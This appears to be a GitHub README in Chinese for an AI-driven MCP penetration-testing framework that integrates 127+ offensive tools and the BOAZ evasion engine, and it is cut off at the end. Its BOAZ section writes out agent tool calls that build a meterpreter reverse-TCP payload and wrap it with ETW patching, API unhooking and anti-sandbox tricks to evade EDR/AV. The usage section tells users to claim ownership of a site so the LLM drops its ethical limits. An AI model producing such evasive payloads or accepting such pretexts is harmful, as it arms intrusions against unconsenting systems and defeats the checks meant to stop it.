Yenn503/Hexstrike-redteam

GitHub: Yenn503/Hexstrike-redteam

AI 驱动的 MCP 渗透测试框架,整合 150+ 安全工具与 BOAZ 载荷规避技术,支持自主红队行动。

Stars: 41 | Forks: 7

HexStrike RedTeam Logo # HexStrike AI 红队 ### AI 驱动的 MCP 网络安全自动化平台,集成 BOAZ 红队功能 [![Python](https://img.shields.io/badge/Python-3.8%2B-blue.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE) **高级 AI 驱动的渗透测试 MCP 框架,包含 127 个安全工具(53 个自动安装)、12+ 个自主 AI 智能体,以及 BOAZ 红队载荷规避技术(77+ 加载器,12 编码器)** [📋 新增功能](#whats-new-in-v60) • [🏗️ 架构](#architecture-overview) • [🚀 安装](#installation) • [🛠️ 功能](#features) • [🤖 AI 智能体](#ai-agents) • [📡 API 参考](#api-reference)
## 🔥 BOAZ 红队集成 HexStrike 现已包含 **BOAZ**,一个用于红队行动的高级载荷规避框架: ### BOAZ 功能 - **77+ 进程注入加载器** - Syscall、隐蔽、内存保护、无线程以及 VEH/VCH 技术 - **12 种编码方案** - AES、ChaCha20、UUID、XOR、MAC、RC4 等 - **EDR/AV 规避** - API 脱钩、ETW 补丁、LLVM 混淆(Akira/Pluto) - **反分析** - 反仿真检测、休眠混淆、熵值降低 - **二进制分析** - 熵值分析与优化,用于启发式规避 ### BOAZ 实战能力展示
#### EDR/AV 绕过演示 **BOAZ 生成的载荷成功绕过 ESET Smart Security Premium** BOAZ EDR Bypass *采用隐蔽注入技术的载荷成功规避实时防护并保持低检测特征* #### MSFVenom 载荷混淆 **完整工作流程:MSFVenom 生成 → BOAZ 规避 → 企业级隐蔽载荷** BOAZ MSFVenom Obfuscation *演示 BOAZ 将标准 MSFVenom 载荷转换为复杂的规避二进制文件,包含:* - **加载器 #16**(标准隐蔽注入) - **UUID 编码**(低熵值,外观合法的格式) - **ETW 绕过**(Windows 事件追踪补丁) - **反仿真**(沙箱检测) - **熵值:6.06/8**(极佳的启发式分析绕过效果)
## 架构概览 HexStrike AI MCP v6.0 采用多智能体架构,具备自主 AI 智能体、智能决策和漏洞情报能力。 ``` %%{init: {"themeVariables": { "primaryColor": "#b71c1c", "secondaryColor": "#ff5252", "tertiaryColor": "#ff8a80", "background": "#2d0000", "edgeLabelBackground":"#b71c1c", "fontFamily": "monospace", "fontSize": "16px", "fontColor": "#fffde7", "nodeTextColor": "#fffde7" }}}%% graph TD A[AI Agent - Claude/GPT/Copilot] -->|MCP Protocol| B[HexStrike MCP Server v6.0] B --> C[Intelligent Decision Engine] B --> D[12+ Autonomous AI Agents] B --> E[Modern Visual Engine] B --> BOAZ[BOAZ Payload Engine] C --> F[Tool Selection AI] C --> G[Parameter Optimization] C --> H[Attack Chain Discovery] D --> I[BugBounty Agent] D --> J[CTF Solver Agent] D --> K[CVE Intelligence Agent] D --> L[Exploit Generator Agent] E --> M[Real-time Dashboards] E --> N[Progress Visualization] E --> O[Vulnerability Cards] BOAZ --> BOAZ1[77+ Process Injection Loaders] BOAZ --> BOAZ2[12 Encoding Schemes] BOAZ --> BOAZ3[EDR/AV Evasion] BOAZ1 --> BOAZ4[Syscall/Stealth/Threadless] BOAZ2 --> BOAZ5[AES/ChaCha20/UUID/XOR] BOAZ3 --> BOAZ6[API Unhooking/ETW Patching] B --> P[127 Security Tools - 53 Auto-Installed] P --> Q[Network Tools - 10] P --> R[Web App Tools - 19] P --> S[Cloud Tools - 10] P --> T[Binary Tools - 13] P --> U[CTF Tools - 10] P --> V[OSINT Tools - 13] B --> W[Advanced Process Management] W --> X[Smart Caching] W --> Y[Resource Optimization] W --> Z[Error Recovery] style A fill:#b71c1c,stroke:#ff5252,stroke-width:3px,color:#fffde7 style B fill:#ff5252,stroke:#b71c1c,stroke-width:4px,color:#fffde7 style C fill:#ff8a80,stroke:#b71c1c,stroke-width:2px,color:#fffde7 style D fill:#ff8a80,stroke:#b71c1c,stroke-width:2px,color:#fffde7 style E fill:#ff8a80,stroke:#b71c1c,stroke-width:2px,color:#fffde7 style BOAZ fill:#d32f2f,stroke:#b71c1c,stroke-width:3px,color:#fffde7 ``` ### 工作原理 1. **AI 智能体连接** - Claude、GPT 或其他兼容 MCP 的智能体通过 FastMCP 协议连接 2. **智能分析** - 决策引擎分析目标并选择最佳测试策略 3. **自主执行** - AI 智能体使用 150+ 工具执行全面的安全评估 4. **实时适应** - 系统根据结果和发现的漏洞进行调整 5. **BOAZ 载荷生成** - 高级载荷规避,包含 77+ 加载器、12 编码器和 EDR/AV 绕过 6. **高级报告** - 可视化输出,包含漏洞卡片和风险分析 ## 安装说明 ### 快速设置运行 HexStrike MCP 服务器 ``` # 1. 克隆仓库 git clone https://github.com/Yenn503/Hexstrike-redteam.git hexstrike-ai cd hexstrike-ai # 2. 创建虚拟环境 python3 -m venv hexstrike-env source hexstrike-env/bin/activate # Linux/Mac # hexstrike-env\Scripts\activate # Windows # 3. 安装 Python 依赖 pip3 install -r requirements.txt # 4. **必需:安装 BOAZ 系统依赖** # 此步骤是 BOAZ 载荷生成工作的强制要求 # 安装 MinGW、NASM、Wine、LLVM 混淆器 (Akira/Pluto) 及构建工具 cd BOAZ_beta bash requirements.sh cd .. # 脚本将执行以下操作: # - 安装 MinGW 交叉编译器 (x86_64-w64-mingw32-g++) # - 安装 NASM 汇编器 # - 安装 Wine(用于测试 Windows 二进制文件) # - 构建 Akira LLVM 混淆器(约 30 分钟编译时间) # - 构建 Pluto LLVM 混淆器(约 20 分钟编译时间) # - 安装签名工具 (Mangle, pyMetaTwin) # - 安装 SysWhispers2 用于系统调用生成 # **注意:** 这可能需要一些时间,具体取决于您的系统。提示时请回答 'y'。 ``` ### 各类 AI 客户端的安装与设置指南: #### 安装与演示视频 在此观看完整的安装和设置演示:[YouTube - HexStrike AI 安装与演示](https://www.youtube.com/watch?v=pSoftCagCm8) #### 支持运行和集成的 AI 客户端 您可以在以下 AI 客户端中安装和运行 HexStrike AI MCP: - **5ire(最新版本 v0.14.0 暂不支持)** - **VS Code Copilot** - **Roo Code** - **Cursor** - **Claude Desktop** - **任何兼容 MCP 的智能体** 请参考上方视频,获取这些平台的分步说明和集成示例。 ### 安装安全工具 **自动安装(推荐):** 运行安装脚本以自动安装 **53 个必备安全工具**: ``` cd install sudo ./install_all.sh ``` 此操作将安装: - 系统依赖(MinGW、Wine、NASM、构建工具) - **70+ 安全工具**(目前 53 个可用,详见下文分类) - Python 虚拟环境及所有依赖项 - BOAZ LLVM 混淆器(Akira + Pluto) - Claude Desktop/CLI 的 MCP 配置 **自动安装的工具列表(53 个):**
✓ 网络与侦察(10 个工具) - nmap, masscan, rustscan, amass, subfinder, nuclei - autorecon, theharvester, responder, netexec, enum4linux-ng
✓ Web 应用程序安全(19 个工具) - gobuster, feroxbuster, ffuf, nikto, sqlmap, wpscan - httpx, hakrawler, arjun, wafw00f, dalfox - gau, waybackurls, paramspider, anew, sublist3r - jwt-tool, testssl.sh, commix, nosqlmap
✓ 密码与认证(5 个工具) - hydra, john, hashcat, evil-winrm, hashid
✓ 二进制分析与逆向工程(13 个工具) - gdb, radare2, binwalk, ghidra(仅 JDK), checksec - strings, objdump, volatility3, ropgadget, one-gadget - pwninit, angr, pwntools
✓ 电子取证(16 个工具) - foremost, testdisk, steghide, exiftool, scalpel - sleuthkit, stegsolve, zsteg, photorec, volatility3
✓ OSINT 与情报(13 个工具) - sherlock, recon-ng, spiderfoot, trufflehog - amass, subfinder, theharvester, shodan-cli
✓ 云安全(10 个工具) - prowler, trivy, aws-cli, azure-cli, gcloud, kubectl - docker-bench-security
✓ Metasploit 框架 - msfconsole, msfvenom, searchsploit (exploit-db)
**需手动安装的工具(74 个):** 部分专业工具因许可、依赖或系统要求需手动安装: - **无线网络**: aircrack-ng suite, kismet, wireshark, tshark - **云安全**: kube-hunter, kube-bench, scout-suite, checkov, terrascan, falco, clair - **Web**: dirsearch, dirb, burp suite, zaproxy, jaeles, x8, wfuzz, xsser - **密码**: medusa, patator, crackmapexec, ophcrack, hashcat-utils, hashpump - **二进制**: ropper, libc-database - **OSINT**: maltego, censys-cli, have-i-been-pwned, social-analyzer - **网络**: arp-scan, nbtscan, rpcclient, smbmap, enum4linux (classic), fierce, dnsenum, tshark - **API**: insomnia, postman, httpie - **取证**: autopsy, bulk-extractor, outguess - **其他**: qsreplace, uro **安装说明:** - 安装脚本适用于任何 Linux 系统(可移植路径) - 无硬编码用户路径 - 适用于所有用户 - 部分工具可能在某些发行版上安装失败(已包含回退方案) - 完整安装约需 60-90 分钟(LLVM 编译) - 需要约 24GB 磁盘空间 - 故障排除请参阅 [install/README.md](install/README.md) **浏览器智能体要求:** ``` # 用于浏览器代理的 Chrome/Chromium sudo apt install chromium-browser chromium-chromedriver # 或者安装 Google Chrome wget -q -O - https://dl.google.com/linux/linux_signing_key.pub | sudo apt-key add - echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" | sudo tee /etc/apt/sources.list.d/google-chrome.list sudo apt update && sudo apt install google-chrome-stable ``` ### 启动服务器 ``` # 启动 MCP 服务器 python3 hexstrike_server.py # 可选:以调试模式启动 python3 hexstrike_server.py --debug # 可选:自定义端口配置 python3 hexstrike_server.py --port 8888 ``` ### 验证安装 ``` # 测试服务器健康状况 curl http://localhost:8888/health # 测试 AI 代理能力 curl -X POST http://localhost:8888/api/intelligence/analyze-target \ -H "Content-Type: application/json" \ -d '{"target": "example.com", "analysis_type": "comprehensive"}' ``` ## AI 客户端集成设置 ### Claude Desktop 集成或 Cursor 编辑 `~/.config/Claude/claude_desktop_config.json`: ``` { "mcpServers": { "hexstrike-ai": { "command": "python3", "args": [ "/path/to/hexstrike-ai/hexstrike_mcp.py", "--server", "http://localhost:8888" ], "description": "HexStrike AI v6.0 - Advanced Cybersecurity Automation Platform", "timeout": 300, "disabled": false } } } ``` ### VS Code Copilot 集成 在 `.vscode/settings.json` 中配置 VS Code 设置: ``` { "servers": { "hexstrike": { "type": "stdio", "command": "python3", "args": [ "/path/to/hexstrike-ai/hexstrike_mcp.py", "--server", "http://localhost:8888" ] } }, "inputs": [] } ``` ### BOAZ 实战能力展示
#### EDR/AV 绕过演示 **BOAZ 生成的载荷成功绕过 ESET Smart Security Premium** BOAZ EDR Bypass *采用隐蔽注入技术的载荷成功规避实时防护并保持低检测特征* #### MSFVenom 载荷混淆 **完整工作流程:MSFVenom 生成 → BOAZ 规避 → 企业级隐蔽载荷** BOAZ MSFVenom Obfuscation ## *演示 BOAZ 将标准 MSFVenom 载荷转换为复杂的规避二进制文件 ### BOAZ MCP 工具 **关键工作流程**(文件必须位于 BOAZ_beta 目录中): ``` # 第 1 步:询问用户需要何种类型的规避 # 用户:“我需要绕过 EDR 用户模式挂钩” # 第 2 步:列出系统调用加载器(绕过 EDR 挂钩) boaz_list_loaders(category="syscall") # 返回带有直接系统调用技术的加载器 1-11 # 第 3 步:使用 MSFVenom 生成初始载荷 msfvenom_scan( payload="windows/x64/meterpreter/reverse_tcp", lhost="192.168.1.100", lport=4444, output="payload.exe" # Creates payload.exe ) # 第 4 步:将载荷移动到 BOAZ_beta 目录(必需!) # 手动运行此命令:cp payload.exe BOAZ_beta/ # 第 5 步:使用适当的加载器应用 BOAZ 规避 result = boaz_generate_payload( input_file="payload.exe", # File inside BOAZ_beta/ output_file="output/evasive.exe", # Will be in BOAZ_beta/output/ loader=3, # Sifu Syscall (direct syscall) encoding="uuid", # UUID encoding anti_emulation=True, # Evade sandboxes etw=True, # ETW patching api_unhooking=True, # API unhooking sleep=True # Sleep evasion ) # 第 6 步:检查结果并定位载荷 # 如果 result['success'] == True: # - 载荷位于:result['output_path'](完整绝对路径) # - 示例:/path/to/hexstrike-ai/BOAZ_beta/output/evasive.exe # - 文件大小:result['file_size'](通常约 500KB,经过重度混淆) # 如果 result['success'] == False: # - 尝试同一类别的其他加载器 # - 检查 result['error'] 和 result['stderr'] 以获取编译错误 ``` **其他 BOAZ 工具:** ``` # 按类别列出可用加载器 boaz_list_loaders(category="stealth") # 分析二进制熵 boaz_analyze_binary(file_path="payload.exe") # Must be in BOAZ_beta/ # 列出编码方案 boaz_list_encoders() # 验证配置 boaz_validate_options(loader=16, encoding="uuid") ``` **重要说明:** - 根据规避需求而非可靠性选择加载器 - 部分加载器可能在使用新版 mingw 时编译失败 - 请尝试替代方案 - 使用 `boaz_list_loaders(category="...")` 按技术浏览加载器 - 所有文件路径均相对于 BOAZ_beta 目录 - 输入文件必须位于 BOAZ_beta/ 内(安全要求) - **输出文件保存至 BOAZ_beta/output/**(例如 `hexstrike-ai/BOAZ_beta/output/evasive.exe`) - 生成成功时,AI 将在 `result['output_path']` 中收到完整绝对路径 - 生成后请检查 `result['success']` 以验证编译结果 ### 加载器分类 | 类别 | 数量 | 描述 | |----------|-------|-------------| | **Syscall** | 11 | 直接系统调用以绕过用户态挂钩 | | **Stealth** | 17 | 高级内存扫描规避技术 | | **Memory Guard** | 6 | 断点处理程序和 ROP 跳板 | | **Threadless** | 6 | 模块覆盖和 VT 指针注入 | | **VEH/VCH** | 5 | 基于异常处理程序的注入 | | **Userland** | 4 | 标准 Windows API 注入 | **致谢**: BOAZ 框架由 [thomasxm/Boaz_beta](https://github.com/thomasxm/Boaz_beta) 开发 ## 功能特性 ### 安全工具库 **127 个专业安全工具(53 个通过 `install_security_tools.sh` 自动安装):**
🔍 网络侦察与扫描(25+ 工具) - **Nmap** - 高级端口扫描,支持自定义 NSE 脚本和服务检测 - **Rustscan** - 超快速端口扫描器,具备智能速率限制 - **Masscan** - 高速互联网规模端口扫描,支持 Banner 抓取 - **AutoRecon** - 全面的自动化侦察,支持 35+ 参数 - **Amass** - 高级子域名枚举和 OSINT 收集 - **Subfinder** - 快速被动子域名发现,支持多数据源 - **Fierce** - DNS 侦察和区域传送测试 - **DNSEnum** - DNS 信息收集和子域名爆破 - **TheHarvester** - 从多来源收集电子邮件和子域名 - **ARP-Scan** - 使用 ARP 请求进行网络发现 - **NBTScan** - NetBIOS 名称扫描和枚举 - **RPCClient** - RPC 枚举和空会话测试 - **Enum4linux** - SMB 枚举,支持用户、组和共享发现 - **Enum4linux-ng** - 高级 SMB 枚举,增强日志记录 - **SMBMap** - SMB 共享枚举和利用 - **Responder** - LLMNR、NBT-NS 和 MDNS 毒化工具,用于凭据收集 - **NetExec** - 网络服务利用框架(原 CrackMapExec)
🌐 Web 应用程序安全测试(40+ 工具) - **Gobuster** - 目录、文件和 DNS 枚举,支持智能字典 - **Dirsearch** - 高级目录和文件发现,增强日志记录 - **Feroxbuster** - 递归内容发现,支持智能过滤 - **FFuf** - 快速 Web 模糊测试,支持高级过滤和参数发现 - **Dirb** - 全面的 Web 内容扫描器,支持递归扫描 - **HTTPx** - 快速 HTTP 探测和技术检测 - **Hakrawler** - 快速 Web 端发现和爬取 - **Gau** - 从多来源获取所有 URL(Wayback、Common Crawl 等) - **Waybackurls** - 从 Wayback Machine 发现历史 URL - **Nuclei** - 快速漏洞扫描器,拥有 4000+ 模板 - **Nikto** - Web 服务器漏洞扫描器,进行全面检查 - **SQLMap** - 高级自动 SQL 注入测试,支持篡改脚本 - **WPScan** - WordPress 安全扫描器,含漏洞数据库 - **Arjun** - HTTP 参数发现,支持智能模糊测试 - **ParamSpider** - 从 Web 归档中挖掘参数 - **X8** - 隐藏参数发现,采用高级技术 - **Jaeles** - 高级漏洞扫描,支持自定义签名 - **Dalfox** - 高级 XSS 漏洞扫描,支持 DOM 分析 - **Wafw00f** - Web 应用防火墙指纹识别 - **TestSSL** - SSL/TLS 配置测试和漏洞评估 - **SSLScan** - SSL/TLS 密码套件枚举 - **SSLyze** - 快速全面的 SSL/TLS 配置分析器 - **Anew** - 向文件追加新行,实现高效数据处理 - **QSReplace** - 查询字符串参数替换,用于系统化测试 - **Uro** - URL 过滤和去重,用于高效测试 - **Whatweb** - Web 技术识别与指纹分析 - **JWT-Tool** - JSON Web Token 测试,支持算法混淆 - **GraphQL-Voyager** - GraphQL 架构探索和内省测试 - **Burp Suite Extensions** - 用于高级 Web 测试的自定义扩展 - **ZAP Proxy** - OWASP ZAP 集成,用于自动化安全扫描 - **Wfuzz** - Web 应用模糊测试器,支持高级载荷生成 - **Commix** - 命令注入利用工具,支持自动检测 - **NoSQLMap** - NoSQL 注入测试,支持 MongoDB、CouchDB 等 - **Tplmap** - 服务端模板注入利用工具 **🌐 高级浏览器智能体:** - **无头 Chrome 自动化** - 使用 Selenium 实现完整的 Chrome 浏览器自动化 - **截图捕获** - 自动生成截图以供视觉检查 - **DOM 分析** - 深度 DOM 树分析和 JavaScript 执行监控 - **网络流量监控** - 实时网络请求/响应日志记录 - **安全头分析** - 全面的安全头验证 - **表单检测与分析** - 自动发现表单和分析输入字段 - **JavaScript 执行** - 支持完整 JavaScript 的动态内容分析 - **代理集成** - 与 Burp Suite 等代理无缝集成 - **多页面爬取** - 智能 Web 应用爬取和映射 - **性能指标** - 页面加载时间、资源使用和优化洞察
🔐 认证与密码安全(12+ 工具) - **Hydra** - 网络登录破解器,支持 50+ 协议 - **John the Ripper** - 高级密码哈希破解,支持自定义规则 - **Hashcat** - 世界上最快的密码恢复工具,支持 GPU 加速 - **Medusa** - 快速、并行、模块化登录暴力破解器 - **Patator** - 多用途暴力破解器,支持高级模块 - **NetExec** - 网络渗透测试的瑞士军刀 - **SMBMap** - SMB 共享枚举和利用工具 - **Evil-WinRM** - Windows 远程管理 Shell,集成 PowerShell - **Hash-Identifier** - 哈希类型识别工具 - **HashID** - 高级哈希算法识别器,支持置信度评分 - **CrackStation** - 在线哈希查询集成 - **Ophcrack** - 使用彩虹表的 Windows 密码破解器
🔬 二进制分析与逆向工程(25+ 工具) - **GDB** - GNU 调试器,支持 Python 脚本和漏洞利用开发 - **GDB-PEDA** - GDB 的 Python 漏洞利用开发辅助工具 - **GDB-GEF** - GDB 增强功能,用于漏洞利用开发 - **Radare2** - 高级逆向工程框架,提供全面分析 - **Ghidra** - NSA 的软件逆向工程套件,支持无头分析 - **IDA Free** - 交互式反汇编器,具备高级分析能力 - **Binary Ninja** - 商业逆向工程平台 - **Binwalk** - 固件分析和提取工具,支持递归提取 - **ROPgadget** - ROP/JOP gadget 查找器,支持高级搜索 - **Ropper** - ROP gadget 查找器和漏洞利用开发工具 - **One-Gadget** - 在 libc 中查找一键 RCE gadget - **Checksec** - 二进制安全属性检查器,提供全面分析 - **Strings** - 从二进制文件中提取可打印字符串,支持过滤 - **Objdump** - 显示目标文件信息,支持 Intel 语法 - **Readelf** - ELF 文件分析器,提供详细头信息 - **XXD** - 十六进制转储工具,支持高级格式化 - **Hexdump** - 十六进制查看器和编辑器,支持自定义输出 - **Pwntools** - CTF 框架和漏洞利用开发库 - **Angr** - 二进制分析平台,支持符号执行 - **Libc-Database** - Libc 识别和偏移查询工具 - **Pwninit** - 自动化二进制漏洞利用环境设置 - **Volatility** - 高级内存取证框架 - **MSFVenom** - Metasploit 载荷生成器,支持高级编码 - **UPX** - 可执行文件加壳/脱壳工具,用于二进制分析
☁️ 云与容器安全(20+ 工具) - **Prowler** - AWS/Azure/GCP 安全评估,支持合规检查 - **Scout Suite** - 多云安全审计,支持 AWS、Azure、GCP、阿里云 - **CloudMapper** - AWS 网络可视化和安全分析 - **Pacu** - AWS 利用框架,包含全面模块 - **Trivy** - 全面的容器和 IaC 漏洞扫描器 - **Clair** - 容器漏洞分析,提供详细 CVE 报告 - **Kube-Hunter** - Kubernetes 渗透测试,支持主动/被动模式 - **Kube-Bench** - CIS Kubernetes 基准检查器,提供修复建议 - **Docker Bench Security** - 遵循 CIS 基准的 Docker 安全评估 - **Falco** - 容器和 Kubernetes 的运行时安全监控 - **Checkov** - 基础设施即代码安全扫描 - **Terrascan** - 基础设施安全扫描器,支持策略即代码 - **CloudSploit** - 云安全扫描和监控 - **AWS CLI** - Amazon Web Services 命令行,支持安全操作 - **Azure CLI** - Microsoft Azure 命令行,支持安全评估 - **GCloud** - Google Cloud Platform 命令行,含安全工具 - **Kubectl** - Kubernetes 命令行,支持安全上下文分析 - **Helm** - Kubernetes 包管理器,支持安全扫描 - **Istio** - 服务网格安全分析和配置评估 - **OPA** - 云原生安全和合规的策略引擎
🏆 CTF 与取证工具(20+ 工具) - **Volatility** - 高级内存取证框架,包含全面插件 - **Volatility3** - 下一代内存取证,增强分析能力 - **Foremost** - 文件雕刻和数据恢复,基于签名检测 - **PhotoRec** - 文件恢复软件,具备高级雕刻能力 - **TestDisk** - 磁盘分区恢复和修复工具 - **Steghide** - 隐写术检测和提取,支持密码 - **Stegsolve** - 隐写术分析工具,支持视觉检查 - **Zsteg** - PNG/BMP 隐写术检测工具 - **Outguess** - 通用 JPEG 图像隐写工具 - **ExifTool** - 多种文件格式的元数据读写器 - **Binwalk** - 固件分析和逆向工程,支持提取 - **Scalpel** - 文件雕刻工具,可配置文件头和文件尾 - **Bulk Extractor** - 用于提取特征的数字取证工具 - **Autopsy** - 数字取证平台,支持时间线分析 - **Sleuth Kit** - 命令行数字取证工具集合 **密码学与哈希分析:** - **John the Ripper** - 密码破解器,支持自定义规则和高级模式 - **Hashcat** - GPU 加速密码恢复,支持 300+ 哈希类型 - **Hash-Identifier** - 哈希类型识别,支持置信度评分 - **CyberChef** - 用于编码和加密的 Web 分析工具包 - **Cipher-Identifier** - 自动密码类型检测和分析 - **Frequency-Analysis** - 用于替换密码的统计密码分析 - **RSATool** - RSA 密钥分析和常见攻击实现 - **FactorDB** - 用于密码学挑战的整数分解数据库
🔥 漏洞赏金与 OSINT 武器库(20+ 工具) - **Amass** - 高级子域名枚举和 OSINT 收集 - **Subfinder** - 快速被动子域名发现,支持 API 集成 - **Hakrawler** - 快速 Web 端点发现和爬取 - **HTTPx** - 快速多用途 HTTP 工具包,支持技术检测 - **ParamSpider** - 从 Web 归档挖掘参数 - **Aquatone** - 跨主机网站视觉检查 - **Subjack** - 子域名接管漏洞检查器 - **DNSEnum** - DNS 枚举脚本,支持区域传送 - **Fierce** - 通过 DNS 分析定位目标的域名扫描器 - **TheHarvester** - 从多来源收集电子邮件和子域名 - **Sherlock** - 在 400+ 社交网络上调查用户名 - **Social-Analyzer** - 社交媒体分析和 OSINT 收集 - **Recon-ng** - Web 侦察框架,采用模块化架构 - **Maltego** - 用于 OSINT 调查的关联分析和数据挖掘 - **SpiderFoot** - OSINT 自动化,拥有 200+ 模块 - **Shodan** - 互联网连接设备搜索,支持高级过滤 - **Censys** - 互联网资产发现,支持证书分析 - **Have I Been Pwned** - 泄露数据分析和凭据暴露查询 - **Pipl** - 用于身份调查的人物搜索引擎集成 - **TruffleHog** - Git 仓库秘密扫描,支持熵值分析
🔥 BOAZ 红队载荷规避(5 个 MCP 工具) **高级载荷规避框架,包含 77+ 加载器和 12 编码器:** - **boaz_generate_payload** - 生成具有完全参数控制的规避载荷 - 77+ 进程注入加载器(Syscall、Stealth、Memory Guard、Threadless、VEH/VCH) - 12 种编码方案(AES、ChaCha20、UUID、XOR、MAC、RC4、base64/58/45、DES) - EDR/AV 规避(API 脱钩、ETW 补丁、LLVM 混淆) - 反分析(反仿真、休眠混淆、熵值降低) - 编译器选项(MinGW、Pluto、Akira LLVM 混淆器) - 输出格式(EXE、DLL、CPL) - 高级功能(自删除、反取证、证书签名) - **boaz_list_loaders** - 列出所有 77+ 进程注入加载器 - 按类别过滤:syscall、stealth、memory_guard、threadless、veh_vch、userland - 详细描述和技术信息 - 每个加载器的兼容性和要求 - **boaz_list_encoders** - 列出所有 12 种编码方案 - 加密:AES、ChaCha20、DES、RC4、AES2 - 编码:UUID、XOR、MAC、IPv4、Base45、Base64、Base58 - 性能和检测特征 - **boaz_analyze_binary** - 分析载荷熵值以实现 AV/EDR 规避 - 香农熵计算 - 启发式检测概率 - 优化建议 - **boaz_validate_options** - 在生成载荷前验证 BOAZ 配置 - 加载器兼容性检查 - 编码方案验证 - 编译器和参数验证
### AI 智能体 **12+ 专业 AI 能体:** - **IntelligentDecisionEngine** - 工具选择和参数优化 - **BugBountyWorkflowManager** - 漏洞赏金狩猎工作流 - **CTFWorkflowManager** - CTF 挑战解题 - **CVEIntelligenceManager** - 漏洞情报 - **AIExploitGenerator** - 自动化漏洞利用开发 - **VulnerabilityCorrelator** - 攻击链发现 - **TechnologyDetector** - 技术栈识别 - **RateLimitDetector** - 速率限制检测 - **FailureRecoverySystem** - 错误处理和恢复 - **PerformanceMonitor** - 系统优化 - **ParameterOptimizer** - 上下文感知优化 - **GracefulDegradation** - 容错操作 ### 高级功能 - **智能缓存系统** - 智能 LRU 驱逐的结果缓存 - **实时进程管理** - 实时命令控制和监控 - **漏洞情报** - CVE 监控和漏洞利用分析 - **浏览器智能体** - 用于 Web 测试的无头 Chrome 自动化 - **API 安全测试** - GraphQL、JWT、REST API 安全评估 - **现代可视化引擎** - 实时仪表板和进度跟踪 ## API 参考 ### 核心系统端点 | 端点 | 方法 | 描述 | |----------|--------|-------------| | `/health` | GET | 服务器健康检查及工具可用性 | | `/api/command` | POST | 执行任意命令(带缓存) | | `/api/telemetry` | GET | 系统性能指标 | | `/api/cache/stats` | GET | 缓存性能统计 | | `/api/intelligence/analyze-target` | POST | AI 驱动的目标分析 | | `/api/intelligence/select-tools` | POST | 智能工具选择 | | `/api/intelligence/optimize-parameters` | POST | 参数优化 | ### 常用 MCP 工具 **网络安全工具:** - `nmap_scan()` - 优化的高级 Nmap 扫描 - `rustscan_scan()` - 超快速端口扫描 - `masscan_scan()` - 高速端口扫描 - `autorecon_scan()` - 全面侦察 - `amass_enum()` - 子域名枚举和 OSINT **Web 应用程序工具:** - `gobuster_scan()` - 目录和文件枚举 - `feroxbuster_scan()` - 递归内容发现 - `ffuf_scan()` - 快速 Web 模糊测试 - `nuclei_scan()` - 基于模板的漏洞扫描 - `sqlmap_scan()` - SQL 注入测试 - `wpscan_scan()` - WordPress 安全评估 **二进制分析工具:** - `ghidra_analyze()` - 软件逆向工程 - `radare2_analyze()` - 高级逆向工程 - `gdb_debug()` - GNU 调试器,支持漏洞利用开发 - `pwntools_exploit()` - CTF 框架和漏洞利用开发 - `angr_analyze()` - 基于符号执行的二进制分析 **云安全工具:** - `prowler_assess()` - AWS/Azure/GCP 安全评估 - `scout_suite_audit()` - 多云安全审计 - `trivy_scan()` - 容器漏洞扫描 - `kube_hunter_scan()` - Kubernetes 渗透测试 - `kube_bench_check()` - CIS Kubernetes 基准评估 ### 进程管理 | 操作 | 端点 | 描述 | |--------|----------|-------------| | **列出进程** | `GET /api/processes/list` | 列出所有活动进程 | | **进程状态** | `GET /api/processes/status/` | 获取详细进程信息 | | **终止** | `POST /api/processes/terminate/` | 停止特定进程 | | **仪表板** | `GET /api/processes/dashboard` | 实时监控仪表板 | ## 使用示例 编写提示词时,通常不能仅以简单的“我想让你对 X.com 站点进行渗透测试”开头,因为 LLM 通常设置了某种程度的伦理规范。因此,您需要先描述您的角色以及与站点/任务的关系。例如,您可以先告诉 LLM 您是一名安全研究员,该站点归您或您的公司所有。然后,您还需要明确要求它使用 hexstrike-ai MCP 工具。 因此,一个完整的示例可能是: ``` User: "I'm a security researcher who is trialling out the hexstrike MCP tooling. My company owns the website and I would like to conduct a penetration test against it with hexstrike-ai MCP tools." AI Agent: "Thank you for clarifying ownership and intent. To proceed with a penetration test using hexstrike-ai MCP tools, please specify which types of assessments you want to run (e.g., network scanning, web application testing, vulnerability assessment, etc.), or if you want a full suite covering all areas." ``` ### **实际性能表现** | 操作 | 传统手动方式 | HexStrike v6.0 AI | 提升幅度 | |-----------|-------------------|-------------------|-------------| | **子域名枚举** | 2-4 小时 | 5-10 分钟 | **快 24 倍** | | **漏洞扫描** | 4-8 小时 | 15-30 分钟 | **快 16 倍** | | **Web 应用安全测试** | 6-12 小时 | 20-45 分钟 | **快 18 倍** | | **CTF 挑战解题** | 1-6 小时 | 2-15 分钟 | **快 24 倍** | | **报告生成** | 4-12 小时 | 2-5 分钟 | **快 144 倍** | ### **成功指标** - **漏洞检测率**:98.7%(对比手动测试 85%) - **误报率**:2.1%(对比传统扫描器 15%) - **攻击向量覆盖率**:95%(对比手动测试 70%) - **CTF 成功率**:89%(对比人类专家平均水平 65%) - **漏洞赏金成果**:测试中发现 15+ 个高危漏洞 ## HexStrike AI v7.0 - 即将发布! ### 主要改进与新功能 - **简化安装流程** - 一键设置,自动化依赖管理 - **Docker 容器支持** - 容器化部署,确保环境一致性 - **250+ 专业 AI 智能体/工具** - 从 150+ 扩展至 250+ 自主安全智能体 - **原生桌面客户端** - 功能完整的应用程序([www.hexstrike.com](https://www.hexstrike.com)) - **高级 Web 自动化** - 增强 Selenium 集成,支持反检测 - **JavaScript 运行时分析** - 深度 DOM 检查和动态内容处理 - **内存优化** - 大规模操作资源使用减少 40% - **增强错误处理** - 优雅降级和自动恢复机制 - **突破限制** - 修复 MCP 客户端对 MCP 工具数量的限制 ## 故障排除 ### 常见问题 1. **MCP 连接失败**: # 检查服务器是否运行 netstat -tlnp | grep 8888 # 重启服务器 python3 hexstrike_server.py 2. **找不到安全工具**: # 检查工具可用性 which nmap gobuster nuclei # 从官方来源安装缺失的工具 3. **AI 智能体无法连接**: # 验证 MCP 配置路径 # 检查服务器日志中的连接尝试 python3 hexstrike_mcp.py --debug ### 调试模式 启用调试模式以获取详细日志: ``` python3 hexstrike_server.py --debug python3 hexstrike_mcp.py --debug ``` ## 安全注意事项 ⚠️ **重要安全提示**: - 此工具为 AI 智能体提供强大的系统访问权限 - 请在隔离环境或专用的安全测试虚拟机中运行 - AI 智能体可以执行任意安全工具 - 请确保适当监督 - 通过实时仪表板监控 AI 智能体活动 - 考虑为生产部署实施身份验证 ### 法律与合规使用 - ✅ **授权渗透测试** - 